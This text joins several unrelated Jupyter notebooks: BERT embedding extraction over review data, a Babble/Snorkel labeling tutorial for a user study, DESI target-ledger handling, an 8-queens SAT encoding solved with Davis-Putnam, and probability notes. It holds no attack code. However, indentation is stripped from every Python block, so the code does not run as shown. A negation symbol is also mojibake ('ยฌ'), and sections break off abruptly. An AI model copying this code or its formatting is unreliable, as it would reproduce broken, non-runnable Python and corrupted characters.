def last_hidden_state_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens)[0]
item_embedding = item_model(item_tokens)[0]
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
#_embeddings[i] = ((dict(user_embedding=user_embedding,
# item_embedding=item_embedding)), label)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = last_hidden_state_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
### 2.2. Sum Last Four Hidden States
```
def sum_last_four_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
        # Sum last four hidden states
user_embedding = tf.reduce_sum(user_embedding[-4:], axis=0)
item_embedding = tf.reduce_sum(item_embedding[-4:], axis=0)
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = sum_last_four_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlastfour_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlastfour_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
### 2.3. Sum Last Twelve Hidden States
```
def sum_last_twelve_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
        # Sum last twelve hidden states
user_embedding = tf.reduce_sum(user_embedding[-12:], axis=0)
item_embedding = tf.reduce_sum(item_embedding[-12:], axis=0)
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = sum_last_twelve_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlasttwelve_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlasttwelve_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
### 2.4. Second-To-Last Hidden State
```
def second_to_last_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
        # Second-to-last hidden state
user_embedding = user_embedding[-2]
item_embedding = item_embedding[-2]
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = second_to_last_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_secondtolast_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_secondtolast_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
### 2.5. First Layer Hidden State
```
def first_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# First embedding
user_embedding = user_embedding[0]
item_embedding = item_embedding[0]
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = first_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_first_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_first_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
### 2.6. Concat Last Four Hidden States
```
def concat_last_four_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
        # Concat last four hidden states
user_embedding = tf.concat(user_embedding[-4:], axis=2)
item_embedding = tf.concat(item_embedding[-4:], axis=2)
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = concat_last_four_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_concatlastfour_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_concatlastfour_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
```
# Unzip the data
# Replace PASSWORD with the password to unzip
!unzip -P PASSWORD ../data.zip -d ../
import sys
sys.path.append("..")
from data.preparer import load_news_dataset
from babble import Explanation
from babble import BabbleStream
from babble.Candidate import Candidate
from analyzer import upload_data
from metal.analysis import lf_summary
from metal.analysis import label_coverage
from metal import LabelModel
from metal.tuners import RandomSearchTuner
from babble.utils import ExplanationIO
import pandas as pd
from datetime import datetime
from snorkel.labeling import filter_unlabeled_dataframe
stat_history = pd.DataFrame()
import nltk
nltk.download("punkt")
pd.set_option('display.max_colwidth', -1)
```
## The Data
These texts discuss either gun politics (1) or computer electronics (0).
If you're not sure about the correct label, that's fine -- either make your best guess or just skip the example.
Load the dataset into training, development, validation, and test sets.
```
df_train, df_dev, df_valid, df_test, _ = load_news_dataset()
print("{} training examples".format(len(df_train)))
print("{} development examples".format(len(df_dev)))
print("{} validation examples".format(len(df_valid)))
print("{} test examples".format(len(df_test)))
```
Convert the data and labels into a Babble-friendly format
```
dfs = [df_train, df_dev]
dfs[0]['label'] = -1
for df in dfs:
df["id"] = range(len(df))
df["label"] += 1
Cs = [df.apply(lambda x: Candidate(x), axis=1) for df in dfs]
# babble labble uses 1 and 2 for labels, while our data uses 0 and 1
# add 1 to convert
Ys = [df.label.values for df in dfs]
Ys[0] -= 1 # no label (training set) should be set to -1
```
Define the labels for this task.
```
ABSTAIN = 0
ELECTRONICS = 1
GUNS = 2
```
# Babble Tutorial
## News forum classification
### You will work with a subset of the 20 Newsgroups dataset.
The texts shown are from one of two forums:
1. Computer Electronics (Label 1)
2. Gun Politics Forum (Label 2)
Your job is to create a training data set to classify texts as belonging to one of these two forums.
__You will do this by writing natural language explanations of why you would label an example a certain way (1 (ELECTRONICS), 2 (GUNS), or 0 (ABSTAIN or no label)).__
These explanations will be parsed into functions which will be aggregated by Snorkel to create training data from unlabeled examples.
You can evaluate your progress based on the coverage and f1 score of your label model, or by training a logistic regression classifier on the data and evaluating the test result.
```
# Start the timer!
stat_history = stat_history.append({
"time": datetime.now(),
"num_lfs": 0,
"f1": 0.0,
"precision": 0.0,
"recall": 0.0,
"training_label_coverage": 0.0,
"training_label_size": 0.0
}, ignore_index=True)
```
Load the data into a *BabbleStream*: an object that iteratively displays candidates, collects and parses explanations.
```
babbler = BabbleStream(Cs, Ys, balanced=True, shuffled=True, seed=456)
```
Here, you can define aliases (a concise way to refer to a set of terms).
In a little bit you'll see an example of how to use aliases.
```
# aliases are a way to refer to a set of words in a rule.
aliases = {
"unit": ["joules", "volts", "ohms", "MHz"]
}
babbler.add_aliases(aliases)
def prettyprint(candidate):
# just a helper function to print the candidate nicely
print("MENTION ID {}".format(candidate.mention_id))
print()
print(candidate.text)
```
Let's look at an example candidate!
```
# Rerun this cell to get a new example
candidate = babbler.next()
prettyprint(candidate)
```
__Next, we'll learn how to write a labelling function from a natural language explanation of why you chose a label for a given candidate.__
## Create Explanations
Creating explanations generally happens in five steps:
1. View candidates
2. Write explanations
3. Get feedback
4. Update explanations
5. Apply label aggregator
Steps 3-5 are optional; explanations may be submitted without any feedback on their quality. However, in our experience, observing how well explanations are being parsed and what their accuracy/coverage on a dev set are (if available) can quickly lead to simple improvements that yield significantly more useful labeling functions.
Once a few labeling functions have been collected, you can use the label aggregator to identify candidates that are being mislabeled and write additional explanations targeting those failure modes.
Feel free to consult the internet or ask your experiment leader.
*For the real task, you will be asked to write labeling functions as quickly and accurately as possible. You will still be allowed to use the internet in this phase, but not ask your experiment leader. You may refer to this tutorial as needed.*
### Collection
Use `babbler` to show candidates
```
candidate = babbler.next()
prettyprint(candidate)
```
Is it about guns or electronics? What makes you think that? (If you don't know, it's okay to make your best guess or skip an example.)
Run the three examples given below, then parse them, and analyze them.
Then, you can try editing them and writing your own functions!
```
e0 = Explanation(
# name of this rule, for your reference
name='electr...',
# label to assign
label=ELECTRONICS,
# natural language description of why you label the candidate this way
condition='A word in the sentence starts with "electr"',
# candidate is an optional argument, it should be the id of an example labeled by this rule.
# This is a fail-safe: if the rule doesn't apply to the candidate you provide, it will be filtered!
candidate = 5
)
e1 = Explanation(
name = 'politics',
label = GUNS,
condition = 'Any of the words "election", "senator", "democrat", "candidate", or "republican" are in the text',
candidate = 33 # the candidate's mention ID, optional argument
)
e2 = Explanation(
name = 'selfdefense',
label = GUNS,
condition = 'because the word "self" occurs before "defense"'
)
```
Below is an example of an explanation that uses an alias: "unit".
You can define more aliases where the BabbleStream is initialized.
```
e3 = Explanation(
name = "units",
label = ELECTRONICS,
condition = 'A word in the sentence is a unit'
)
e4 = Explanation(
name = "e4",
label = ABSTAIN,
condition = ""
)
```
Babble will parse your explanations into functions, then filter out functions that are duplicates, incorrectly label their given candidate, or assign the same label to all examples.
```
# Add any explanations that you haven't committed yet
explanations = [e0, e1, e2, e3]
parses, filtered = babbler.apply(explanations)
stat_history = stat_history.append({
"time": datetime.now(),
"num_lfs": len(parses),
"num_explanations": len(explanations),
"num_filtered": len(filtered)
}, ignore_index=True)
```
### Analysis
See how your parsed explanations performed
```
try:
dev_analysis = babbler.analyze(parses)
display(dev_analysis)
dev_analysis['time'] = datetime.now()
dev_analysis['eval'] = "dev"
dev_analysis["lf_id"] = dev_analysis.index
stat_history = stat_history.append(dev_analysis, sort=False, ignore_index=True)
except ValueError as e:
print("It seems as though none of your labeling functions were parsed. See the cells above and below for more information.")
print("ERROR:")
print(e)
```
See which explanations were filtered and why
```
babbler.filtered_analysis(filtered)
babbler.commit()
```
### Evaluation
Get feedback on the performance of your explanations
```
Ls = [babbler.get_label_matrix(split) for split in [0,1,2]]
lf_names = [lf.__name__ for lf in babbler.get_lfs()]
lf_summary(Ls[1], Ys[1], lf_names=lf_names)
search_space = {
'n_epochs': [50, 100, 500],
'lr': {'range': [0.01, 0.001], 'scale': 'log'},
'show_plots': False,
}
tuner = RandomSearchTuner(LabelModel, seed=123)
label_aggregator = tuner.search(
search_space,
train_args=[Ls[0]],
X_dev=Ls[1], Y_dev=Ys[1],
max_search=20, verbose=False, metric='f1')
# record statistics over time
pr, re, f1, acc = label_aggregator.score(Ls[1], Ys[1], metric=['precision', 'recall', 'f1', 'accuracy'])
stats = {
"precision": pr,
"recall": re,
"f1": f1,
"accuracy": acc,
"eval": "dev",
"model": "label_aggregator",
"time": datetime.now(),
"training_label_coverage": label_coverage(Ls[0]),
"training_label_size": label_coverage(Ls[0])*len(dfs[0])
}
stat_history = stat_history.append(stats, ignore_index=True)
```
Is one LF performing badly? Use the cell below to inspect some incorrectly labeled examples. You will need to input the LF ID (also called "j")
```
# view some incorrectly labeled examples for a given LF
j = 0
print(lf_names[j])
# set j to match the value of the LF you're interested in
L_dev = Ls[1].todense()
display(df_dev[L_dev[:,j].A1==abs(df_dev["label"]-3)])
```
## Train and Evaluate a Model
We can train a simple bag of words model on these labels, and see test accuracy.
(This step may take a while).
```
L_train = Ls[0].todense()
probs_train = label_aggregator.predict_proba(L=L_train)
mask = (L_train != 0).any(axis=1).A1
df_train_filtered = df_train.iloc[mask]
probs_train_filtered = probs_train[mask]
print("{} out of {} examples used for training data".format(len(df_train_filtered), len(df_train)))
from analyzer import train_model_from_probs
stats = train_model_from_probs(df_train_filtered, probs_train_filtered, df_valid, df_test)
stats["time"] = datetime.now()
stat_history = stat_history.append(stats, ignore_index=True)
```
## FINISHED?
### It's time to save.
When your time is up, please save your explanations and model!
```
# Enter your name (for file naming)
YOUR_NAME = ""
!mkdir babble_tutorial
# save statistics history
stat_history.to_csv("babble_tutorial/statistics_history.csv")
%history -p -o -f babble_tutorial/history.log
!cp babble_tutorial.ipynb babble_tutorial/notebook.ipynb
# save explanations
FILE = "babble_tutorial/explanations.tsv"
from types import SimpleNamespace
exp_io = ExplanationIO()
for exp in explanations:
if exp.candidate is None:
exp.candidate = SimpleNamespace(mention_id = None)
exp_io.write(explanations, FILE)
explanations = exp_io.read(FILE)
# save label model
label_aggregator.save("babble_tutorial/lfmodel.pkl")
# zip and upload the data
import shutil
shutil.make_archive(YOUR_NAME + "_babble_tutorial", 'zip', "babble_tutorial")
assert len(YOUR_NAME) > 0
upload_data(YOUR_NAME + "_babble_tutorial.zip")
```
...And you're done!
## THANK YOU :]
```
import glob
import numpy as np
from astropy.table import Table
from desitarget.io import read_mtl_ledger
from desitarget.mtl import make_mtl, inflate_ledger
```
# Original documentation
https://github.com/desihub/desitarget/pull/635
Grab a starting targets file.
```
# Standard target files, hp 39 only.
targets = Table.read('/project/projectdirs/desi/target/catalogs/dr8/0.39.0/targets/sv/resolve//dark/sv1-targets-dr8-hp-39.fits')
targets
```
Call to create a ledger from the targets:
```
# ! make_ledger('/project/projectdirs/desi/target/catalogs/dr8/0.39.0/targets/sv/resolve/dark/', '/global/cscratch1/sd/adamyers/egledger/mtl/sv1/dark/', obscon="DARK", numproc=1)
```
Retrieve a pre-created version (or run the commented command above). Which ledgers are available?
```
ledgers = glob.glob('/global/cscratch1/sd/adamyers/egledger/mtl/sv1/dark/*.ecsv')
ledgers[:10]
# Only healpixels with targets are processed.
hpxls = np.array([x.split('-')[-1].replace('.ecsv', '') for x in ledgers]).astype(int)  # np.int was removed in newer NumPy; plain int works
hpxls = np.unique(hpxls)
hpxls
# HEALPixel-split ledger files generated from the standard target files.
# A new data model that includes a state for each target, a timestamp for when a target's state was updated,
# and the desitarget code version that was used to update the target's state.
ledger = read_mtl_ledger('/global/cscratch1/sd/adamyers/egledger/mtl/sv1/dark/sv1mtl-dark-hp-8400.ecsv')
ledger = Table(ledger)
ledger
uids, cnts = np.unique(ledger['TARGETID'], return_counts=True)
# Initialised ledger.
np.unique(cnts)
# Does this match up with fiberassign input arguments? Did this rundate change? Now YYYY-MM-DD.
ledger['TIMESTAMP']
ledger['VERSION']
```
Create an MTL (now slimmed by default) from the ledger files:
```
# Columns are now automatically trimmed to a minimum necessary set in desitarget.mtl.make_mtl()
mtl = make_mtl(ledger, obscon='DARK')
# TIMESTAMP -> LAST_TIMESTAMP?
mtl
```
Each TARGETID only appears once in the mtl, with the latest state:
```
uids, cnts = np.unique(mtl['TARGETID'], return_counts=True)
cnts.max()
imtl = inflate_ledger(mtl, '/project/projectdirs/desi/target/catalogs/dr8/0.39.0/targets/sv/resolve//dark/', columns=None, header=False, strictcols=False)
len(imtl.dtype.names), len(mtl.dtype.names)
```
New columns in inflated ledger:
```
[x for x in list(imtl.dtype.names) if x not in list(mtl.dtype.names)]
ledger_updates = glob.glob('/global/cscratch1/sd/adamyers/egupdates/mtl/sv1/dark/*.ecsv')
ledger_updates[:10]
update = read_mtl_ledger('/global/cscratch1/sd/adamyers/egupdates/mtl/sv1/dark/sv1mtl-dark-hp-8400.ecsv')
update = Table(update)
update
uids, cnts = np.unique(update['TARGETID'], return_counts=True)
np.unique(cnts)
np.unique(update['NUMOBS'])
```
# Done.
```
from IPython.core.display import HTML
with open('style.css', 'r') as file:
css = file.read()
HTML(css)
```
# The 8-Queens Problem
The <a href="https://en.wikipedia.org/wiki/Eight_queens_puzzle">eight queens puzzle</a> is the problem of placing eight chess queens on a chessboard so that no two queens can capture each other. In <a href="https://en.wikipedia.org/wiki/Chess">chess</a> a queen can capture another piece if this piece is either
<ol>
<li>in the same row,</li>
<li>in the same column, or</li>
<li>in the same diagonal.</li>
</ol>
The image below shows a queen in row 3, column 4. All the locations where a piece can be captured by this queen are marked with an arrow.
<img src="queen-captures.png">
We will solve this puzzle by coding it as a formula of propositional logic. This formula will be solvable iff the eight queens puzzle has a solution. We will use the algorithm of Davis and Putnam to compute the solution of this formula.
```
%run Davis-Putnam.ipynb
```
The function $\texttt{var}(r, c)$ takes a row $r$ and a column $c$ and returns the string $\texttt{'Q(}r\texttt{,}c\texttt{)'}$. This string is interpreted as a propositional variable specifying that there is a queen in row $r$ and column $c$. The image below shows how theses variables correspond to the positions on a chess board.
<img src="queens-vars.png">
```
def var(row, col):
return 'Q(' + str(row) + ',' + str(col) + ')'
var(2,5)
```
Given a set of propositional variables $S$, the function $\texttt{atMostOne}(S)$ returns a set of clauses expressing the fact that **at most one** of the variables in $S$ is `True`.
```
def atMostOne(S):
return { frozenset({('ยฌ',p), ('ยฌ', q)}) for p in S
for q in S
if p != q
}
atMostOne({'a', 'b', 'c'})
```
Given a <tt>row</tt> and the size of the board $n$, the procedure $\texttt{atMostOneInRow}(\texttt{row}, n)$ computes a set of clauses that is `True` if and only if there is at most one queen in $\texttt{row}$.
```
def atMostOneInRow(row, n):
return atMostOne({ var(row, col) for col in range(1,n+1) })
atMostOneInRow(3, 4)
```
Given a column <tt>col</tt> and the size of the board $n$, the procedure $\texttt{oneInColumn}(\texttt{col}, n)$ computes a set of clauses that is true if and only if there is at least one queen in the column $\texttt{col}$.
```
def oneInColumn(col, n):
return { frozenset({ var(row, col) for row in range(1,n+1) }) }
oneInColumn(2, 4)
```
Given a number $k$ and the size of the board $n$, the procedure $\texttt{atMostOneInFallingDiagonal}(k, n)$ computes a set of clauses that is `True` if and only if there is at most one queen in the falling diagonal specified by the equation
$$ \texttt{row} - \texttt{col} = k. $$
```
def atMostOneInFallingDiagonal(k, n):
S = { var(row, col) for row in range(1, n+1)
for col in range(1, n+1)
if row - col == k
}
return atMostOne(S)
atMostOneInFallingDiagonal(0, 4)
```
Given a number $k$ and the size of the board $n$, the procedure $\texttt{atMostOneInRisingDiagonal}(k, n)$ computes a set of clauses that is `True` if and only if there is at most one queen in the rising diagonal specified by the equation
$$ \texttt{row} + \texttt{col} = k. $$
```
def atMostOneInRisingDiagonal(k, n):
S = { var(row, col) for row in range(1, n+1)
for col in range(1, n+1)
if row + col == k
}
return atMostOne(S)
atMostOneInRisingDiagonal(5, 4)
```
The function $\texttt{allClauses}(n)$ takes the size of the board $n$ and computes a set of clauses that specify that
<ol>
<li>there is at most one queen in every row,</li>
<li>there is at most one queen in every rising diagonal,</li>
<li>there is at most one queen in every falling diagonal, and</li>
<li>there is at least one queen in every column.</li>
</ol>
```
def allClauses(n):
All = [ atMostOneInRow(row, n) for row in range(1, n+1) ] \
+ [ atMostOneInRisingDiagonal(k, n) for k in range(3, (2*n-1)+1) ] \
+ [ atMostOneInFallingDiagonal(k, n) for k in range(-(n-2), (n-2)+1) ] \
+ [ oneInColumn(col, n) for col in range(1, n+1) ]
return { clause for S in All for clause in S }
for C in allClauses(8):
print(set(C))
```
The set of all clauses contains 512 clauses. There are 64 variables.
```
len(allClauses(8))
```
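As a small sanity check on that number (an aside that assumes Python 3.8+ for `math.comb`): the 8 rows contribute $8 \cdot {8 \choose 2} = 224$ pairwise clauses, each of the 13 rising and 13 falling diagonals with $m$ squares contributes ${m \choose 2}$ clauses, and the 8 at-least-one-queen-per-column clauses complete the count.
```
from math import comb

rows      = 8 * comb(8, 2)                                        # at most one queen per row
diagonals = sum(comb(m, 2) for m in [2,3,4,5,6,7,8,7,6,5,4,3,2])  # one diagonal direction
columns   = 8                                                     # at least one queen per column
print(rows + 2 * diagonals + columns)                             # 512
```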
The function $\texttt{printBoard}(I, n)$ takes a set of unit clauses $I$ that represents a propositional valuation solving the $n$ queens problem and prints the solution represented by $I$.
```
def printBoard(I, n):
if I == { frozenset() }:
return
print("-" * (8*n+1))
for row in range(1, n+1):
printEmptyLine(n)
line = "|";
for col in range(1, n+1):
if frozenset({ var(row, col) }) in I:
line += " Q |"
else:
line += " |"
print(line)
printEmptyLine(n)
print("-" * (8*n+1))
def printEmptyLine(n):
line = "|"
for col in range(1, n+1):
line += " |"
print(line)
```
The function $\texttt{queens}(n)$ solves the n queens problem.
```
def queens(n):
"Solve the n queens problem."
Clauses = allClauses(n)
Solution = solve(Clauses, set())
if Solution != { frozenset() }:
return Solution
else:
print(f'The problem is not solvable for {n} queens!')
%%time
Solution = queens(8)
```
The fact that it takes less than a second to solve the 8 queens puzzle demonstrates the efficiency of the Davis-Putnam procedure.
```
printBoard(Solution, 8)
```
In order to have a more convenient view of the solution, we have to install `python-chess`.
This can be done using the following command:
```
!pip install python-chess
import chess
```
This function takes a solution, represented as a set of unit clauses, and displays it as a chess board with n queens.
```
def show_solution(Solution, n):
board = chess.Board(None) # create empty chess board
queen = chess.Piece(chess.QUEEN, True)
for row in range(1, n+1):
for col in range(1, n+1):
field_number = (row - 1) * 8 + col - 1
if frozenset({ var(row, col) }) in Solution:
board.set_piece_at(field_number, queen)
display(board)
show_solution(Solution, 8)
```
# 6. Probability
## 6.1 Dependence and Independence
pass
## 6.2 Conditional Probability
Noted here because the code is a nice example: the probabilities are computed from counts of how often each event occurs.
- `P(both | older)`: the probability that both siblings are girls, given that the older child is a girl
- `P(both | either)`: the probability that both siblings are girls, given that at least one of the siblings is a girl
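For reference, the exact values that the simulation below should approach (assuming each child is independently a girl with probability 1/2) are
$$
P(\text{both} \mid \text{older}) = \frac{P(\text{both})}{P(\text{older})} = \frac{1/4}{1/2} = \frac{1}{2},
\qquad
P(\text{both} \mid \text{either}) = \frac{P(\text{both})}{P(\text{either})} = \frac{1/4}{3/4} = \frac{1}{3}
$$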
```
import random
def random_kid():
return random.choice(["boy", "girl"])
both_girls = 0
older_girl = 0
either_girl = 0
random.seed(0)
for _ in range(10000):
younger = random_kid()
older = random_kid()
if older == "girl":
older_girl += 1
if older == "girl" and younger == "girl":
both_girls += 1
if older == "girl" or younger == "girl":
either_girl += 1
print ("P(both | older):", both_girls / older_girl)
print ("P(both | either): ", both_girls / either_girl)
```
## 6.3 Bayes's Theorem
pass
## 6.4 Random Variables
### 6.4.1 Random variable
$$
X(\omega): \omega \rightarrow x \\
P(X=x) = p
$$
> The sample `ω` is mapped to the number `x` (a scalar or a vector).
> The random variable `X` takes the value `x` with probability `p`.
- A random variable is a variable that assigns a numerical value to an event occurring with some probability. It is usually written with an uppercase `X`.
- A concrete value of the random variable `X` is written with a lowercase `x`.
- For example, for a coin toss where heads/tails are written as H/T and each occurs with probability 0.5, we can write `P(X='H') = 0.5`.
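As a quick numerical illustration of the coin example, in the same simulation style as the conditional-probability code above:
```
import random

random.seed(0)
# Estimate P(X = 'H') for a fair coin by counting outcomes
flips = [random.choice(['H', 'T']) for _ in range(10000)]
print(flips.count('H') / len(flips))  # close to 0.5
```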
### 6.4.2 Probability Function
Reference links: from Data Science School, [What is a probability model?](https://datascienceschool.net/view-notebook/56e7a25aad2a4539b3c31eb3eb787a54) and [The difference between a probability distribution function and a probability density function](https://datascienceschool.net/view-notebook/4d74d1b5651245a7903583f30ae44608/); and [user132704's answer](https://math.stackexchange.com/questions/175850/difference-between-probability-density-function-and-probability-distribution) on Math Stack Exchange.
- Start with the **continuous random variable**.
    + Take some continuous quantity, for example the position a clock hand points to, as a continuous random variable.
    + Its value ranges from 0 up to (but not including) 360 degrees, and it can take continuous real values such as 15.5 or 20.4831 degrees.
- Under a uniform distribution, the probability that the hand points at a specific position, for example **exactly at 1, is 0**: the total probability of 1 is split over infinitely many possible values, so each single value gets probability 0.
- Therefore, describing the probability distribution of a continuous random variable requires **interval information (a start and an end value)**, e.g. the probability of lying between 1 and 2, or between 5 and 7.
- Rather than using two arbitrary values, we can fix the start value and vary only the end value; the function of the end value obtained this way is the **cumulative distribution function (CDF)**.
    + The start value is usually taken to be negative infinity.
    + The function is written with an uppercase **F**; F(x) is the value of the CDF whose end value is x.
    + $F(x) = P(\{X < x\}) = P(X < x)$
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/ca/Normal_Distribution_CDF.svg/600px-Normal_Distribution_CDF.svg.png" width="450">
